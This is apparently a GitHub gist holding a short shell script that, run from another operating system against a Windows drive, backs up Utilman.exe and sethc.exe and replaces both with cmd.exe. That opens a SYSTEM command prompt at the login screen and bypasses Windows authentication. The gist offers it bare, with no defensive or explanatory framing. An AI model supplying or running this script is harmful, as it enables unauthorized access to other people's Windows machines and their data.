Created
April 26, 2018 03:06
-
-
Save SmartManoj/6bbcffe6da9505b359a46649a7a600cc to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
mount -o remount ,rw . | |
cd Windows/System32 | |
cp Utilman.exe Utilman.exe.bak | |
cp sethc.exe sethc.exe.bak | |
cp cmd.exe Utilman.exe | |
cp cmd.exe sethc.exe |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment